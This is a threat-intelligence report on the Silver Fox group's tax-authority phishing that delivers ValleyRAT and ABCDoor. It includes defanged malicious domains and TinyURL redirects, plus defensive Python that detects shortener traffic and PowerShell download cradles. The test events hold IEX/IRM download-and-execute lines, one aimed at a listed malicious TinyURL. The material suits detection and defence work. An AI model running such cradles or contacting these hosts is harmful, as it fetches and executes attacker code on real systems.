Full Report
The Silver Fox group is targeting companies in Russia and India by impersonating tax authorities to distribute ValleyRAT and the new ABCDoor backdoor.
Analysis Summary
# Threat Actor: Silver Fox
## Attribution & Identity
* **Name:** Silver Fox
* **Aliases:** None specified, but the actor is characterized by its use of the **ValleyRAT** malware family and a newly discovered backdoor named **ABCDoor**.
* **Associations:** The group shows high proficiency in social engineering and brand impersonation, specifically mimicking government regulatory and tax bodies.
## Activity Summary
Silver Fox intensified its campaigns throughout 2025, continuing into November 2025, against organizations in Russia and India. The operations primarily revolve around tax-themed phishing and the distribution of sophisticated backdoors.
* **Early 2025:** Deployment of ValleyRAT via tax-themed lures.
* **May - August 2025:** Diversification of delivery techniques using TinyURL and dynamic arguments in download links to track "channels" (e.g., WhatsApp, phone/dianhua).
* **November 2025:** Shift toward using JavaScript loaders packaged within SFX and ZIP archives to bypass traditional security perimeters.
## Tactics, Techniques & Procedures
* **Phishing & Social Engineering:** Impersonating tax authorities (Russian Federal Tax Service, Indian Central Board of Direct Taxes) and the Ministry of Corporate Affairs (India).
* **Lure Documents:** Use of legitimate-looking executable files (e.g., `GTSuvidha.exe`, `MCA-Ministry.exe`) and malicious PDFs or JS loaders.
* **Staging & Redirection:** Utilization of URL shorteners (TinyURL) to hide the final payload destination.
* **PowerShell Execution:** Use of `IEX` (Invoke-Expression) and `IRM` (Invoke-RestMethod) to download and execute remote scripts directly in memory.
* **Packaging:** Delivery of payloads via Self-Extracting (SFX) archives and ZIP files to evade simple file filters.
* **Tracking:** Use of URL parameters (e.g., `?channel=whatsapp_0826`) to monitor the success of different infection vectors.
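The staging and tracking techniques above (URL shorteners hiding the payload host, and `?channel=` parameters tagging each infection vector) are easy to surface from proxy or DNS logs. The following is an added example, not code from the original report: it refangs defanged indicators, flags requests to shortener hosts, extracts the channel tag, and runs that logic over a constructed proxy log. The shortener list, the log format and the `staging.example` host are assumptions; only `tinyurl.com` and the `4nzkync8` path come from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a starting list of URL-shortener hosts; extend for your environment.
SHORTENER_HOSTS = {"tinyurl.com", "bit.ly", "t.co", "goo.gl", "is.gd"}

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>" (assumed format).
CONSTRUCTED_PROXY_LOG = """\
2025-08-26T09:14:02Z 10.0.5.21 GET http://tinyurl.com/4nzkync8 302
2025-08-26T09:14:03Z 10.0.5.21 GET https://staging.example/GTSuvidha.exe?channel=whatsapp_0826 200
2025-08-26T09:20:11Z 10.0.5.40 GET https://www.example.com/index.html 200
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def refang(ioc: str) -> str:
    """Turn report notation such as 'tinyurl[.]com' or 'hxxp://' back into a usable URL."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def analyse_url(url: str) -> dict:
    """Classify one URL: shortener host? channel tag present? which vector does the tag name?"""
    u = refang(url)
    if "://" not in u:
        u = "http://" + u          # bare host/path indicator; scheme only matters for parsing
    parts = urlsplit(u)
    host = (parts.hostname or "").lower()
    channel = parse_qs(parts.query).get("channel", [None])[0]
    # Assumption: the tag is "<vector>_<suffix>", e.g. whatsapp_0826; the prefix names the vector.
    vector = channel.split("_", 1)[0] if channel else None
    is_shortener = host in SHORTENER_HOSTS
    return {
        "host": host,
        "is_shortener": is_shortener,
        "channel": channel,
        "channel_vector": vector,
        "suspicious": is_shortener or channel is not None,
    }


def scan_proxy_log(text: str) -> list:
    """Return one alert per log line whose URL hits a shortener or carries a channel tag."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue                # skip lines that do not match the assumed format
        info = analyse_url(m["url"])
        if info["suspicious"]:
            alerts.append({"ts": m["ts"], "src": m["src"], **info})
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(CONSTRUCTED_PROXY_LOG):
        print(alert)
```

Correlating the two hits from the same client (a shortener redirect followed seconds later by an executable download carrying a channel tag) is the pattern worth alerting on; either one alone is noisy in an environment where shorteners are permitted.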
## Targeting
* **Sectors:** Industrial companies, services sector, and broader commercial entities dealing with tax compliance.
* **Geography:** Primarily **Russia** and **India**.
* **Victims:** Specific organizations were not named, but the lures specifically target users of the Indian **MCA** (Ministry of Corporate Affairs) and **CBDT** (Central Board of Direct Taxes) portals.
## Tools & Infrastructure
* **Malware:**
    * **ValleyRAT:** A modular remote access trojan.
    * **ABCDoor:** A newly identified backdoor capable of remote file manipulation and command execution.
    * **NSIS Installers:** Used for establishing remote access connections.
* **Infrastructure:**
    * abc.fetish-friends[.]com (Payload delivery)
    * vnc.kcii2[.]com (Remote access C2)
    * roldco[.]com (Staging/Download)
    * sudsmama[.]com (Staging/Download)
    * tinyurl[.]com/4nzkync8 (Redirection)
    * tinyurl[.]com/bde63yuu (Redirection)
    * tinyurl[.]com/322ccxbf (Redirection)
## Implications
Silver Fox represents a persistent regional threat focused on economic hubs. The evolution from ValleyRAT to the bespoke ABCDoor suggests the group is investing in custom development to maintain stealth. Their ability to pivot lures between different geographical tax seasons (Russia vs. India) indicates a highly organized and reactive operation.
## Mitigations
* **File Screening:** Block or scrutinize the execution of SFX archives and JavaScript files arriving via email or external web downloads.
* **PowerShell Monitoring:** Enable PowerShell Constrained Language Mode and Script Block Logging (Event ID 4104), and alert on `IEX`/`IRM` download-and-execute patterns in the logged script text.
* **Network Filtering:** Monitor and potentially block traffic to known URL shorteners in enterprise environments if not required for business.
* **User Training:** Educate employees in finance and legal departments regarding "tax-themed" social engineering, emphasizing that government bodies rarely deliver software updates via TinyURL links.
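To show what the PowerShell monitoring item looks like in practice, here is an added detection example (not code from the original report) that triages Event ID 4104 script block records: it normalizes the logged script text, looks for the `IEX`/`IRM` in-memory download pattern the report describes together with shortener hosts and encoded commands, and assigns a severity. The event records are constructed in-line with an assumed field layout (`EventID`, `Computer`, `ScriptBlockText`); the backtick-stripping step is a simple normalization assumed here so that split tokens do not evade the match.

```python
import re

# Pattern families observed in PowerShell download-and-execute one-liners.
CRADLE_PATTERNS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(
        r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest)\b|downloadstring|net\.webclient", re.I
    ),
    "url_shortener": re.compile(r"\btinyurl\.com/", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

# Constructed 4104 records (assumed field names); the tinyurl path is the one listed in the report.
CONSTRUCTED_EVENTS = [
    {"EventID": 4104, "Computer": "fin-ws01", "ScriptBlockText": "IEX (IRM 'http://tinyurl.com/4nzkync8')"},
    {"EventID": 4104, "Computer": "fin-ws02", "ScriptBlockText": "i`ex (i`rm 'http://example.invalid/a.ps1')"},
    {"EventID": 4104, "Computer": "it-ws07", "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
]


def normalize(script: str) -> str:
    """Remove backtick escapes and collapse whitespace so split tokens such as i`ex match."""
    return re.sub(r"\s+", " ", script.replace("`", "")).strip()


def analyse_script_block(script: str) -> dict:
    """Match one script block against the pattern families and rate it."""
    norm = normalize(script)
    hits = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(norm)]
    # Execution primitive plus remote fetch in the same block is the download cradle itself.
    cradle = "invoke_expression" in hits and "remote_fetch" in hits
    severity = "high" if cradle else ("medium" if hits else "none")
    return {"hits": hits, "download_cradle": cradle, "severity": severity}


def triage_events(events: list) -> list:
    """Return an alert for every 4104 record whose script text matches at least one family."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        result = analyse_script_block(ev.get("ScriptBlockText", ""))
        if result["severity"] != "none":
            alerts.append({"Computer": ev.get("Computer"), **result})
    return alerts


if __name__ == "__main__":
    for alert in triage_events(CONSTRUCTED_EVENTS):
        print(alert)
```

The `medium` tier (a single family, for example a shortener URL without an execution primitive) is where legitimate administration scripts will land; tune that tier per host group rather than dropping it, since the report's loaders arrive through ordinary user downloads rather than admin tooling.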